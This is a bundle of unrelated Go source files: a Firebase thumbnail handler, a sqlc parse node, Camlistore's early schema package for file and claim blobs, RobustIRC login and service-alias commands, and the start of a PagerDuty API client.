		width, err := strconv.Atoi(fields.Width.IntegerValue)
		if err != nil {
			return out, err
		}
		out.Sizes = append(out.Sizes, Size{Width: width, Height: height})
	}
	out.Ready = false
	return out, nil
}
// ThumbHandler handles a Firestore thumbnail-request event: it decodes
// the event fields, generates the requested thumbnails, and marks the
// request document Ready.
//
// Fixes: the original called log.Fatal on errors, which terminates the
// whole process (making the following `return err` unreachable and
// preventing the platform from retrying); it also silently discarded
// the error from the final Firestore Set.
func ThumbHandler(ctx context.Context, e FirestoreEvent) error {
	fullPath := strings.Split(e.Value.Name, "/documents/")[1]
	pathParts := strings.Split(fullPath, "/")
	log.Println(pathParts)
	js, err := json.Marshal(e.Value.Fields)
	if err != nil {
		log.Printf("marshal event fields: %v", err)
		return err
	}
	log.Printf("event fields: %v", string(js))
	thub, err := convertToThubStrcut(e.Value.Fields)
	if err != nil {
		log.Printf("convert event fields: %v", err)
		return err
	}
	Thubnails(cstor, bucket, thub.Path, thub.Sizes)
	thub.Ready = true
	log.Printf("Thub is: %v", thub)
	// Persist the Ready flag; the document ID is the last path segment.
	_, err = fstore.Collection("service").Doc("service").Collection("thubnail").Doc(pathParts[len(pathParts)-1]).Set(
		ctx,
		thub,
	)
	return err
}
// Thubnails reads filename from the bucket and writes one resized copy
// per entry in sizes, named "<dir>/@thub_<W>X<H>_<base>".
//
// Fixes: the original ignored the error from imaging.Decode (a decode
// failure left src nil and panicked inside imaging.Thumbnail), ignored
// the error from imaging.Encode, shadowed the stdlib io package with a
// local variable, and re-derived the output format on every loop
// iteration even though it only depends on filename.
func Thubnails(cstor *gstorage.Client, bucket *gstorage.BucketHandle, filename string, sizes []Size) {
	b, err := firebasestorage.Read(cstor, bucket, filename)
	if err != nil {
		log.Fatal(err)
	}
	src, err := imaging.Decode(bytes.NewReader(b))
	if err != nil {
		log.Fatal(err)
	}
	// Split filename into directory prefix and base name.
	path := strings.Split(filename, "/")
	f := path[len(path)-1]
	p := strings.Join(path[:len(path)-1], "/")
	fmt.Printf("%v/%v", p, f)
	// Output format depends only on the filename; resolve it once.
	filetype, err := imaging.FormatFromFilename(filename)
	if err != nil {
		log.Fatal(err)
	}
	for _, size := range sizes {
		img := imaging.Thumbnail(src, size.Width, size.Height, imaging.Lanczos)
		var buf bytes.Buffer
		if err := imaging.Encode(&buf, img, filetype); err != nil {
			log.Println(err)
			continue
		}
		err = firebasestorage.Write(cstor, bucket, fmt.Sprintf("%v/@thub_%vX%v_%v", p, size.Width, size.Height, f), &buf)
		if err != nil {
			log.Println(err)
		}
	}
}
|
package pg
import (
"github.com/kyleconroy/sqlc/internal/sql/ast"
)
// DefElem mirrors PostgreSQL's DefElem parse node: a generic
// name/value definition used in option lists (e.g. CREATE statements).
type DefElem struct {
	Defnamespace *string       // optional namespace qualifying the name
	Defname      *string       // option name
	Arg          ast.Node      // option value, as an AST node
	Defaction    DefElemAction // how the definition is applied
	Location     int           // byte offset in the source SQL
}
// Pos returns this node's byte offset within the original SQL source.
func (n *DefElem) Pos() int {
	pos := n.Location
	return pos
}
|
/*
Copyright 2011 Google Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package schema
import (
"bufio"
"bytes"
"crypto/sha1"
"fmt"
"io"
"json"
"log"
"os"
"rand"
"strconv"
"strings"
"sync"
"syscall"
"time"
"camli/blobref"
)
var _ = log.Printf // keep "log" imported even when debug prints are removed

// Sentinel errors for schema handling (pre-Go1 os.NewError API).
var ErrNoCamliVersion = os.NewError("schema: no camliVersion key in map")
var ErrUnimplemented = os.NewError("schema: unimplemented")
// StatHasher abstracts lstat'ing and content-hashing a file so callers
// can substitute fakes (see DefaultStatHasher for the real one).
type StatHasher interface {
	Lstat(fileName string) (*os.FileInfo, os.Error)
	Hash(fileName string) (*blobref.BlobRef, os.Error)
}

// File is a read-only view of a "file" schema blob's contents.
type File interface {
	Close() os.Error
	// Skip advances the read position by up to skipBytes; presumably the
	// return value is the number of bytes actually skipped — confirm
	// against the implementation.
	Skip(skipBytes uint64) uint64
	Read(p []byte) (int, os.Error)
}
// Directory is a read-only interface to a "directory" schema blob.
type Directory interface {
	// Readdir reads the contents of the directory associated with dr
	// and returns an array of up to n DirectoryEntries structures.
	// Subsequent calls on the same file will yield further
	// DirectoryEntries.
	// If n > 0, Readdir returns at most n DirectoryEntry structures. In
	// this case, if Readdir returns an empty slice, it will return
	// a non-nil error explaining why. At the end of a directory,
	// the error is os.EOF.
	// If n <= 0, Readdir returns all the DirectoryEntries from the
	// directory in a single slice. In this case, if Readdir succeeds
	// (reads all the way to the end of the directory), it returns the
	// slice and a nil os.Error. If it encounters an error before the
	// end of the directory, Readdir returns the DirectoryEntry read
	// until that point and a non-nil error.
	Readdir(count int) ([]DirectoryEntry, os.Error)
}

// Symlink is a read-only interface to a "symlink" schema blob.
type Symlink interface {
	// .. TODO
}

// DirectoryEntry is a read-only interface to an entry in a (static)
// directory.
type DirectoryEntry interface {
	// CamliType returns the schema blob's "camliType" field.
	// This may be "file", "directory", "symlink", or other more
	// obscure types added in the future.
	CamliType() string
	FileName() string
	BlobRef() *blobref.BlobRef
	File() (File, os.Error)           // if camliType is "file"
	Directory() (Directory, os.Error) // if camliType is "directory"
	Symlink() (Symlink, os.Error)     // if camliType is "symlink"
}
// dirEntry is the default implementation of DirectoryEntry, lazily
// materializing a FileReader or DirReader on first use.
type dirEntry struct {
	ss      Superset
	fetcher blobref.SeekFetcher
	fr      *FileReader // built by File(); nil if not (yet) a file
	dr      *DirReader  // built by Directory(); nil if not (yet) a directory
}
// CamliType returns the entry's schema "camliType" value.
func (de *dirEntry) CamliType() string {
	typ := de.ss.Type
	return typ
}
// FileName returns the entry's file name from its superset.
func (de *dirEntry) FileName() string {
	name := de.ss.FileNameString()
	return name
}
// BlobRef returns the blobref of the entry's schema blob.
func (de *dirEntry) BlobRef() *blobref.BlobRef {
	ref := de.ss.BlobRef
	return ref
}
// File returns a reader over the entry's file contents, constructing the
// underlying FileReader lazily on first call. It fails unless the
// entry's camliType is "file".
func (de *dirEntry) File() (File, os.Error) {
	if de.fr != nil {
		return de.fr, nil
	}
	if de.ss.Type != "file" {
		return nil, fmt.Errorf("DirectoryEntry is camliType %q, not %q", de.ss.Type, "file")
	}
	fr, err := NewFileReader(de.fetcher, de.ss.BlobRef)
	if err != nil {
		return nil, err
	}
	de.fr = fr
	return de.fr, nil
}
// Directory returns a Directory view of the entry, constructing the
// underlying DirReader lazily on first call. It fails unless the entry's
// camliType is "directory".
func (de *dirEntry) Directory() (Directory, os.Error) {
	if de.dr != nil {
		return de.dr, nil
	}
	if de.ss.Type != "directory" {
		return nil, fmt.Errorf("DirectoryEntry is camliType %q, not %q", de.ss.Type, "directory")
	}
	dr, err := NewDirReader(de.fetcher, de.ss.BlobRef)
	if err != nil {
		return nil, err
	}
	de.dr = dr
	return de.dr, nil
}
// Symlink is unimplemented and always returns a nil Symlink plus an
// error. (The original returned 0, which boxed the integer zero into the
// Symlink interface — a meaningless, non-nil value for callers that
// check the first result.)
func (de *dirEntry) Symlink() (Symlink, os.Error) {
	return nil, os.NewError("TODO: Symlink not implemented")
}
// NewDirectoryEntry wraps ss in a DirectoryEntry. ss must be non-nil,
// carry a BlobRef, and be of camliType "file", "directory", or
// "symlink".
// TODO(mpl): symlink
// TODO: "fifo", "socket", "char", "block", probably. later.
func NewDirectoryEntry(fetcher blobref.SeekFetcher, ss *Superset) (DirectoryEntry, os.Error) {
	if ss == nil {
		return nil, os.NewError("ss was nil")
	}
	if ss.BlobRef == nil {
		return nil, os.NewError("ss.BlobRef was nil")
	}
	switch ss.Type {
	case "file", "directory", "symlink":
		// acceptable types
	default:
		return nil, fmt.Errorf("invalid DirectoryEntry camliType of %q", ss.Type)
	}
	// Copy *ss defensively so later caller mutations can't affect the entry.
	entry := &dirEntry{ss: *ss, fetcher: fetcher}
	return entry, nil
}
// NewDirectoryEntryFromBlobRef takes a BlobRef and returns a
// DirectoryEntry if the BlobRef contains a type "file", "directory"
// or "symlink".
// TODO: "fifo", "socket", "char", "block", probably. later.
func NewDirectoryEntryFromBlobRef(fetcher blobref.SeekFetcher, blobRef *blobref.BlobRef) (DirectoryEntry, os.Error) {
	ss := new(Superset)
	if err := ss.setFromBlobRef(fetcher, blobRef); err != nil {
		// Error strings must not end in a newline (Go convention); the
		// original message had a trailing "\n".
		return nil, fmt.Errorf("schema/filereader: can't fill Superset: %v", err)
	}
	return NewDirectoryEntry(fetcher, ss)
}
// Superset represents the superset of common camlistore JSON schema
// keys as a convenient json.Unmarshal target. Most fields are only
// meaningful for particular camliTypes.
type Superset struct {
	BlobRef *blobref.BlobRef // Not in JSON, but included for
	// those who want to set it.

	Version int    `json:"camliVersion"`
	Type    string `json:"camliType"`

	Signer string `json:"camliSigner"`
	Sig    string `json:"camliSig"`

	// Claim fields (camliType "claim").
	ClaimType string `json:"claimType"`
	ClaimDate string `json:"claimDate"`

	Permanode string `json:"permaNode"`
	Attribute string `json:"attribute"`
	Value     string `json:"value"`

	// TODO: ditch both the FooBytes variants below. a string doesn't have to be UTF-8.

	FileName      string        `json:"fileName"`
	FileNameBytes []interface{} `json:"fileNameBytes"` // TODO: needs custom UnmarshalJSON?

	SymlinkTarget      string        `json:"symlinkTarget"`
	SymlinkTargetBytes []interface{} `json:"symlinkTargetBytes"` // TODO: needs custom UnmarshalJSON?

	// Unix metadata (file-common schema).
	UnixPermission string `json:"unixPermission"`
	UnixOwnerId    int    `json:"unixOwnerId"`
	UnixOwner      string `json:"unixOwner"`
	UnixGroupId    int    `json:"unixGroupId"`
	UnixGroup      string `json:"unixGroup"`
	UnixMtime      string `json:"unixMtime"`
	UnixCtime      string `json:"unixCtime"`
	UnixAtime      string `json:"unixAtime"`

	Parts []*BytesPart `json:"parts"`

	Entries string   `json:"entries"` // for directories, a blobref to a static-set
	Members []string `json:"members"` // for static sets (for directory static-sets:
	// blobrefs to child dirs/files)
}
// BytesPart describes one contiguous span of a file's bytes: its size
// plus at most one reference to where those bytes live.
type BytesPart struct {
	// Required.
	Size uint64 `json:"size"`

	// At most one of:
	BlobRef  *blobref.BlobRef `json:"blobRef,omitempty"`
	BytesRef *blobref.BlobRef `json:"bytesRef,omitempty"`

	// Optional (default value is zero if unset anyway):
	Offset uint64 `json:"offset,omitempty"`
}
// stringFromMixedArray reassembles a string from a JSON-decoded mixed
// array whose elements are either string runs or float64 byte values.
// Elements of any other type are silently skipped.
func stringFromMixedArray(parts []interface{}) string {
	var buf bytes.Buffer
	for _, part := range parts {
		switch v := part.(type) {
		case string:
			buf.WriteString(v)
		case float64:
			buf.WriteByte(byte(v))
		}
	}
	return buf.String()
}
// SumPartsSize returns the total byte size across all of ss's parts.
func (ss *Superset) SumPartsSize() (size uint64) {
	for _, part := range ss.Parts {
		size += part.Size // Size is already uint64; the old uint64(...) conversion was redundant
	}
	return size
}
// SymlinkTargetString returns the symlink target, preferring the plain
// UTF-8 field and falling back to the mixed-array byte form.
func (ss *Superset) SymlinkTargetString() string {
	if target := ss.SymlinkTarget; target != "" {
		return target
	}
	return stringFromMixedArray(ss.SymlinkTargetBytes)
}
// FileNameString returns the file name, preferring the plain UTF-8 field
// and falling back to the mixed-array byte form.
func (ss *Superset) FileNameString() string {
	if name := ss.FileName; name != "" {
		return name
	}
	return stringFromMixedArray(ss.FileNameBytes)
}
// HasFilename reports whether the superset's effective file name is name.
func (ss *Superset) HasFilename(name string) bool {
	return name == ss.FileNameString()
}
// UnixMode reconstructs a Unix mode word from the schema's octal
// "unixPermission" string, OR'ing in the file-type bit implied by
// camliType. A malformed permission string contributes no bits.
func (ss *Superset) UnixMode() (mode uint32) {
	// Btoui64 is the pre-Go1 base-N string-to-uint64 parser (base 8 here).
	m64, err := strconv.Btoui64(ss.UnixPermission, 8)
	if err == nil {
		mode = mode | uint32(m64)
	}

	// TODO: add other types
	switch ss.Type {
	case "directory":
		mode = mode | syscall.S_IFDIR
	case "file":
		mode = mode | syscall.S_IFREG
	case "symlink":
		mode = mode | syscall.S_IFLNK
	}
	return
}
// DefaultStatHasher is the StatHasher used when callers don't supply one.
var DefaultStatHasher = &defaultStatHasher{}

// defaultStatHasher implements StatHasher against the real filesystem.
type defaultStatHasher struct{}

// Lstat wraps os.Lstat (does not follow symlinks).
func (d *defaultStatHasher) Lstat(fileName string) (*os.FileInfo, os.Error) {
	return os.Lstat(fileName)
}
// Hash returns the SHA-1 blobref of the file's entire contents,
// streaming the file through the hash rather than loading it in memory.
func (d *defaultStatHasher) Hash(fileName string) (*blobref.BlobRef, os.Error) {
	s1 := sha1.New()
	file, err := os.Open(fileName)
	if err != nil {
		return nil, err
	}
	defer file.Close()
	_, err = io.Copy(s1, file)
	if err != nil {
		return nil, err
	}
	return blobref.FromHash("sha1", s1), nil
}
// StaticSet accumulates blobrefs destined for a "static-set" schema
// blob. The mutex guards refs against concurrent Add/Map calls.
type StaticSet struct {
	l    sync.Mutex
	refs []*blobref.BlobRef
}
// Add appends ref to the set under the set's lock.
func (ss *StaticSet) Add(ref *blobref.BlobRef) {
	ss.l.Lock()
	ss.refs = append(ss.refs, ref)
	ss.l.Unlock()
}
// newCamliMap returns a schema map pre-populated with the two keys every
// camli blob requires: camliVersion and camliType.
func newCamliMap(version int, ctype string) map[string]interface{} {
	return map[string]interface{}{
		"camliVersion": version,
		"camliType":    ctype,
	}
}
// NewUnsignedPermanode returns a new, not-yet-signed permanode schema
// map whose "random" key holds 20 random printable-ASCII bytes
// (characters 32..125) to make the blob unique.
func NewUnsignedPermanode() map[string]interface{} {
	m := newCamliMap(1, "permanode")
	chars := make([]byte, 20)
	// Don't need cryptographically secure random here, as this
	// will be GPG signed anyway.
	rnd := rand.New(rand.NewSource(time.Nanoseconds()))
	for idx, _ := range chars {
		chars[idx] = byte(32 + rnd.Intn(126-32))
	}
	m["random"] = string(chars)
	return m
}
// Map returns a Camli map of camliType "static-set" whose "members" key
// lists the string form of every blobref added so far.
func (ss *StaticSet) Map() map[string]interface{} {
	m := newCamliMap(1, "static-set")
	ss.l.Lock()
	defer ss.l.Unlock()

	members := make([]string, 0, len(ss.refs))
	if ss.refs != nil {
		for _, ref := range ss.refs {
			members = append(members, ref.String())
		}
	}
	m["members"] = members
	return m
}
// MapToCamliJson serializes m as canonical camli JSON with the
// "camliVersion" key forced onto the first line of the output. Returns
// ErrNoCamliVersion when m lacks that key. m is restored before return.
func MapToCamliJson(m map[string]interface{}) (string, os.Error) {
	version, hasVersion := m["camliVersion"]
	if !hasVersion {
		return "", ErrNoCamliVersion
	}
	// Temporarily delete the key (pre-Go1 map-delete syntax) so
	// MarshalIndent doesn't emit it; it is re-emitted by hand below.
	m["camliVersion"] = 0, false
	jsonBytes, err := json.MarshalIndent(m, "", " ")
	if err != nil {
		return "", err
	}
	m["camliVersion"] = version
	buf := new(bytes.Buffer)
	fmt.Fprintf(buf, "{\"camliVersion\": %v,\n", version)
	// Skip the marshaled "{\n" so the hand-written first line splices in.
	buf.Write(jsonBytes[2:])
	return string(buf.Bytes()), nil
}
// NewFileMap returns a new schema map of camliType "file" for fileName.
func NewFileMap(fileName string) map[string]interface{} {
	fileMap := NewCommonFilenameMap(fileName)
	fileMap["camliType"] = "file"
	return fileMap
}
// NewCommonFilenameMap returns a schema map with the base name of
// fileName recorded — under "fileName" when it is valid UTF-8, otherwise
// under "fileNameBytes". The camliType is left empty for the caller.
func NewCommonFilenameMap(fileName string) map[string]interface{} {
	m := newCamliMap(1, "" /* no type yet */ )
	if fileName == "" {
		return m
	}
	baseName := fileName[strings.LastIndex(fileName, "/")+1:]
	if isValidUtf8(baseName) {
		m["fileName"] = baseName
	} else {
		m["fileNameBytes"] = []uint8(baseName)
	}
	return m
}
// NewCommonFileMap builds a schema map carrying the Unix metadata shared
// by all file-like blobs (permissions, owner/group, mtime/ctime), per
// file-common.txt. Uses the pre-Go1 *os.FileInfo field API.
func NewCommonFileMap(fileName string, fi *os.FileInfo) map[string]interface{} {
	m := NewCommonFilenameMap(fileName)
	// Common elements (from file-common.txt)
	if !fi.IsSymlink() {
		m["unixPermission"] = fmt.Sprintf("0%o", fi.Permission())
	}
	if fi.Uid != -1 {
		m["unixOwnerId"] = fi.Uid
		if user := getUserFromUid(fi.Uid); user != "" {
			m["unixOwner"] = user
		}
	}
	if fi.Gid != -1 {
		m["unixGroupId"] = fi.Gid
		if group := getGroupFromGid(fi.Gid); group != "" {
			m["unixGroup"] = group
		}
	}
	if mtime := fi.Mtime_ns; mtime != 0 {
		m["unixMtime"] = RFC3339FromNanos(mtime)
	}
	// Include the ctime too, if it differs.
	if ctime := fi.Ctime_ns; ctime != 0 && fi.Mtime_ns != fi.Ctime_ns {
		m["unixCtime"] = RFC3339FromNanos(ctime)
	}

	return m
}
// PopulateParts fills m's "parts" key from parts, validating that each
// part references at most one of blobRef/bytesRef and that the part
// sizes sum exactly to size.
func PopulateParts(m map[string]interface{}, size int64, parts []BytesPart) os.Error {
	sumSize := int64(0)
	mparts := make([]map[string]interface{}, len(parts))
	for idx, part := range parts {
		mpart := make(map[string]interface{})
		mparts[idx] = mpart
		switch {
		case part.BlobRef != nil && part.BytesRef != nil:
			return os.NewError("schema: part contains both blobRef and bytesRef")
		case part.BlobRef != nil:
			mpart["blobRef"] = part.BlobRef.String()
		case part.BytesRef != nil:
			mpart["bytesRef"] = part.BytesRef.String()
		}
		mpart["size"] = part.Size
		sumSize += int64(part.Size)
		// "offset" is omitted when zero (the schema default).
		if part.Offset != 0 {
			mpart["offset"] = part.Offset
		}
	}
	if sumSize != size {
		return fmt.Errorf("schema: declared size %d doesn't match sum of parts size %d", size, sumSize)
	}
	m["parts"] = mparts
	return nil
}
// PopulateSymlinkMap marks m as camliType "symlink" and stores the link
// target of fileName — under "symlinkTarget" when valid UTF-8, otherwise
// under "symlinkTargetBytes".
func PopulateSymlinkMap(m map[string]interface{}, fileName string) os.Error {
	m["camliType"] = "symlink"
	target, err := os.Readlink(fileName)
	if err != nil {
		return err
	}
	if isValidUtf8(target) {
		m["symlinkTarget"] = target
	} else {
		m["symlinkTargetBytes"] = []uint8(target)
	}
	return nil
}
// NewBytes returns a fresh schema map of camliType "bytes".
func NewBytes() map[string]interface{} {
	bytesMap := newCamliMap(1, "bytes")
	return bytesMap
}
// PopulateDirectoryMap marks m as a directory whose entries live in the
// static-set blob referenced by staticSetRef.
func PopulateDirectoryMap(m map[string]interface{}, staticSetRef *blobref.BlobRef) {
	m["entries"] = staticSetRef.String()
	m["camliType"] = "directory"
}
// NewShareRef returns a "share" claim map granting authType access to
// target, optionally transitively.
func NewShareRef(authType string, target *blobref.BlobRef, transitive bool) map[string]interface{} {
	shareMap := newCamliMap(1, "share")
	shareMap["target"] = target.String()
	shareMap["authType"] = authType
	shareMap["transitive"] = transitive
	return shareMap
}
// NewClaim returns a "claim" map of claimType against permaNode,
// stamped with the current time (pre-Go1 time.Nanoseconds API).
func NewClaim(permaNode *blobref.BlobRef, claimType string) map[string]interface{} {
	m := newCamliMap(1, "claim")
	m["permaNode"] = permaNode.String()
	m["claimType"] = claimType
	m["claimDate"] = RFC3339FromNanos(time.Nanoseconds())
	return m
}
// newAttrChangeClaim builds a claim of claimType targeting the given
// attribute/value pair on permaNode.
func newAttrChangeClaim(permaNode *blobref.BlobRef, claimType, attr, value string) map[string]interface{} {
	claim := NewClaim(permaNode, claimType)
	claim["value"] = value
	claim["attribute"] = attr
	return claim
}
// NewSetAttributeClaim returns a claim replacing attr's value on permaNode.
func NewSetAttributeClaim(permaNode *blobref.BlobRef, attr, value string) map[string]interface{} {
	return newAttrChangeClaim(permaNode, "set-attribute", attr, value)
}

// NewAddAttributeClaim returns a claim adding value to attr on permaNode.
func NewAddAttributeClaim(permaNode *blobref.BlobRef, attr, value string) map[string]interface{} {
	return newAttrChangeClaim(permaNode, "add-attribute", attr, value)
}
// NewDelAttributeClaim returns a claim removing attr from permaNode.
func NewDelAttributeClaim(permaNode *blobref.BlobRef, attr string) map[string]interface{} {
	m := newAttrChangeClaim(permaNode, "del-attribute", attr, "")
	// Pre-Go1 map-delete syntax: remove the "value" key entirely.
	m["value"] = "", false
	return m
}
// Types of ShareRefs.
// ShareHaveRef grants access to anyone who possesses the share's blobref.
const ShareHaveRef = "haveref"
// RFC3339FromNanos formats a Unix-epoch nanosecond count as an RFC 3339
// UTC timestamp, appending fractional seconds (with trailing zeros
// trimmed) only when non-zero. Uses the pre-Go1 time.SecondsToUTC API.
func RFC3339FromNanos(epochnanos int64) string {
	nanos := epochnanos % 1e9
	esec := epochnanos / 1e9
	t := time.SecondsToUTC(esec)
	timeStr := t.Format(time.RFC3339)
	if nanos == 0 {
		return timeStr
	}
	nanoStr := fmt.Sprintf("%09d", nanos)
	nanoStr = strings.TrimRight(nanoStr, "0")
	// Splice ".<frac>" in before the trailing "Z".
	return timeStr[:len(timeStr)-1] + "." + nanoStr + "Z"
}
// NanosFromRFC3339 parses an RFC 3339 timestamp (with optional
// fractional seconds, which require a trailing "Z") into Unix-epoch
// nanoseconds. Returns -1 on malformed input.
func NanosFromRFC3339(timestr string) int64 {
	dotpos := strings.Index(timestr, ".")
	simple3339 := timestr
	nanostr := ""
	if dotpos != -1 {
		if !strings.HasSuffix(timestr, "Z") {
			return -1
		}
		// Strip the fractional part for the base parse...
		simple3339 = timestr[:dotpos] + "Z"
		nanostr = timestr[dotpos+1 : len(timestr)-1]
		// ...and right-pad it to a full 9 digits of nanoseconds.
		if needDigits := 9 - len(nanostr); needDigits > 0 {
			nanostr = nanostr + "000000000"[:needDigits]
		}
	}
	t, err := time.Parse(time.RFC3339, simple3339)
	if err != nil {
		return -1
	}
	nanos, _ := strconv.Atoi64(nanostr)
	return t.Seconds()*1e9 + nanos
}
func populateMap(m map[int]string, file string) {
f, err := os.Open(file)
if err != nil {
return
}
bufr := bufio.NewReader(f)
for {
line, err := bufr.ReadString('\n')
if err != nil {
return
}
parts := strings.SplitN(line, ":", 4)
if len(parts) >= 3 {
idstr := parts[2]
id, err := strconv.Atoi(idstr)
if err == nil {
m[id] = parts[0]
}
}
}
}
// uidToUsernameMap caches uid -> username, filled once from /etc/passwd.
var uidToUsernameMap map[int]string
var getUserFromUidOnce sync.Once

// getUserFromUid returns the username for uid, or "" if unknown.
// The passwd file is read at most once per process.
func getUserFromUid(uid int) string {
	getUserFromUidOnce.Do(func() {
		uidToUsernameMap = make(map[int]string)
		populateMap(uidToUsernameMap, "/etc/passwd")
	})
	return uidToUsernameMap[uid]
}
// gidToUsernameMap caches gid -> group name, filled once from /etc/group.
// NOTE(review): both the map name ("Username") and the parameter name
// ("uid") are misnomers — these are group ids/names.
var gidToUsernameMap map[int]string
var getGroupFromGidOnce sync.Once

// getGroupFromGid returns the group name for the gid, or "" if unknown.
func getGroupFromGid(uid int) string {
	getGroupFromGidOnce.Do(func() {
		gidToUsernameMap = make(map[int]string)
		populateMap(gidToUsernameMap, "/etc/group")
	})
	return gidToUsernameMap[uid]
}
// isValidUtf8 reports whether s decodes without producing the Unicode
// replacement character U+FFFD. Pre-Go1 code: []int(s) is the old rune
// conversion, and "rune" here is just a loop variable name (the rune
// type did not exist yet).
// NOTE(review): a string that legitimately contains U+FFFD is also
// rejected by this check.
func isValidUtf8(s string) bool {
	for _, rune := range []int(s) {
		if rune == 0xfffd {
			return false
		}
	}
	return true
}
|
package ircserver
import (
"fmt"
"os"
"strings"
"github.com/prometheus/client_golang/prometheus"
"gopkg.in/sorcix/irc.v2"
)
var (
	// captchaChallengesSent counts CAPTCHA challenge URLs sent to users,
	// exported via Prometheus (registered in init).
	captchaChallengesSent = prometheus.NewCounter(
		prometheus.CounterOpts{
			Subsystem: "captcha",
			Name:      "challenges_sent",
			Help:      "Number of CAPTCHA challenges generated and sent to users",
		},
	)
	// Commands maps upper-case IRC command names to their handlers.
	Commands = make(map[string]*ircCommand)
)
// ircCommand describes the handler for a single IRC command verb.
type ircCommand struct {
	Func func(*IRCServer, *Session, *Replyctx, *irc.Message)

	// MinParams ensures that enough parameters were specified.
	// irc.ERR_NEEDMOREPARAMS is returned in case less than MinParams
	// parameters were found, otherwise, Func is called.
	MinParams int
}
// init registers the CAPTCHA metric and wires every services-alias
// command name (NICKSERV/NS, CHANSERV/CS, …) to the shared alias
// handler. A test-only PANIC command can be enabled via environment
// variable to exercise panic handling.
func init() {
	prometheus.MustRegister(captchaChallengesSent)

	serviceAlias := &ircCommand{Func: (*IRCServer).cmdServiceAlias}
	for _, name := range []string{
		"NICKSERV", "CHANSERV", "OPERSERV", "MEMOSERV", "HOSTSERV", "BOTSERV",
		"NS", "CS", "OS", "MS", "HS", "BS",
	} {
		Commands[name] = serviceAlias
	}

	if os.Getenv("ROBUSTIRC_TESTING_ENABLE_PANIC_COMMAND") == "1" {
		Commands["PANIC"] = &ircCommand{
			Func: func(i *IRCServer, s *Session, reply *Replyctx, msg *irc.Message) {
				panic("PANIC called")
			},
		}
	}
}
// maybeLogin completes registration once both NICK and USER have been
// received; it is called by either cmdNick or cmdUser, depending on
// which message the client sends last. When a CAPTCHA is required and
// not yet solved it sends a challenge URL instead of logging in.
func (i *IRCServer) maybeLogin(s *Session, reply *Replyctx, msg *irc.Message) {
	if s.loggedIn {
		return
	}
	// Registration is incomplete until both NICK and USER have arrived.
	if s.Nick == "" || s.Username == "" {
		return
	}

	if i.captchaRequiredForLogin() {
		captcha := extractPassword(s.Pass, "captcha")
		if err := i.verifyCaptcha(s, captcha); err != nil {
			captchaUrl := i.generateCaptchaURL(s, fmt.Sprintf("login:%d:", s.LastActivity.UnixNano()))
			i.sendUser(s, reply, &irc.Message{
				Prefix:  i.ServerPrefix,
				Command: irc.NOTICE,
				Params:  []string{s.Nick, "To login, please go to " + captchaUrl},
			})
			captchaChallengesSent.Inc()
			return
		}
	}

	s.loggedIn = true

	// Standard welcome burst (RPL_WELCOME .. RPL_MYINFO).
	i.sendUser(s, reply, &irc.Message{
		Prefix:  i.ServerPrefix,
		Command: irc.RPL_WELCOME,
		Params:  []string{s.Nick, "Welcome to RobustIRC!"},
	})

	i.sendUser(s, reply, &irc.Message{
		Prefix:  i.ServerPrefix,
		Command: irc.RPL_YOURHOST,
		Params:  []string{s.Nick, "Your host is " + i.ServerPrefix.Name},
	})

	i.sendUser(s, reply, &irc.Message{
		Prefix:  i.ServerPrefix,
		Command: irc.RPL_CREATED,
		Params:  []string{s.Nick, "This server was created " + i.ServerCreation.UTC().String()},
	})

	i.sendUser(s, reply, &irc.Message{
		Prefix:  i.ServerPrefix,
		Command: irc.RPL_MYINFO,
		Params:  []string{s.Nick, i.ServerPrefix.Name + " v1 i nstix"},
	})

	// send ISUPPORT as per:
	// http://www.irc.org/tech_docs/draft-brocklesby-irc-isupport-03.txt
	// http://www.irc.org/tech_docs/005.html
	i.sendUser(s, reply, &irc.Message{
		Prefix:  i.ServerPrefix,
		Command: "005",
		Params: []string{
			"CHANTYPES=#",
			"CHANNELLEN=" + maxChannelLen,
			"NICKLEN=" + maxNickLen,
			"MODES=1",
			"PREFIX=(o)@",
			"KNOCK",
			"are supported by this server",
		},
	})

	// Introduce the new user to the services server.
	i.sendServices(reply, &irc.Message{
		Command: irc.NICK,
		Params: []string{
			s.Nick,
			"1", // hopcount (ignored by anope)
			"1", // timestamp
			s.Username,
			s.ircPrefix.Host,
			i.ServerPrefix.Name,
			s.svid,
			"+",
			s.Realname,
		},
	})

	// Auto-identify with NickServ when a nickserv password was supplied.
	if pass := extractPassword(s.Pass, "nickserv"); pass != "" {
		i.sendServices(reply, &irc.Message{
			Prefix:  &s.ircPrefix,
			Command: irc.PRIVMSG,
			Params:  []string{"NickServ", fmt.Sprintf("IDENTIFY %s", pass)},
		})
	}

	// Auto-OPER when an oper password was supplied.
	if pass := extractPassword(s.Pass, "oper"); pass != "" {
		parsed := irc.ParseMessage("OPER " + pass)
		if len(parsed.Params) > 1 {
			i.cmdOper(s, reply, parsed)
		}
	}

	// In the interest of privacy, clear the password to make
	// accidental leaks less likely.
	s.Pass = ""

	i.cmdMotd(s, reply, msg)
}
// cmdServiceAlias rewrites a services-alias command (NICKSERV/NS,
// CHANSERV/CS, …) into the equivalent "PRIVMSG <Service> :<params>"
// message and dispatches it; unknown commands are ignored.
//
// Fix: the original scanned the whole alias map for every message — a
// direct map lookup on the upper-cased command does the same thing.
func (i *IRCServer) cmdServiceAlias(s *Session, reply *Replyctx, msg *irc.Message) {
	aliases := map[string]string{
		"NICKSERV": "PRIVMSG NickServ :",
		"NS":       "PRIVMSG NickServ :",
		"CHANSERV": "PRIVMSG ChanServ :",
		"CS":       "PRIVMSG ChanServ :",
		"OPERSERV": "PRIVMSG OperServ :",
		"OS":       "PRIVMSG OperServ :",
		"MEMOSERV": "PRIVMSG MemoServ :",
		"MS":       "PRIVMSG MemoServ :",
		"HOSTSERV": "PRIVMSG HostServ :",
		"HS":       "PRIVMSG HostServ :",
		"BOTSERV":  "PRIVMSG BotServ :",
		"BS":       "PRIVMSG BotServ :",
	}
	expanded, ok := aliases[strings.ToUpper(msg.Command)]
	if !ok {
		return
	}
	i.cmdPrivmsg(s, reply, irc.ParseMessage(expanded+strings.Join(msg.Params, " ")))
}
|
package api
import (
"time"
"github.com/PagerDuty/go-pagerduty"
)
// Client is the package-level PagerDuty client, set by
// InitialisePagerDutyAPIClient.
var Client *PagerDutyClient

// PagerDutyClient wraps the go-pagerduty API client.
type PagerDutyClient struct {
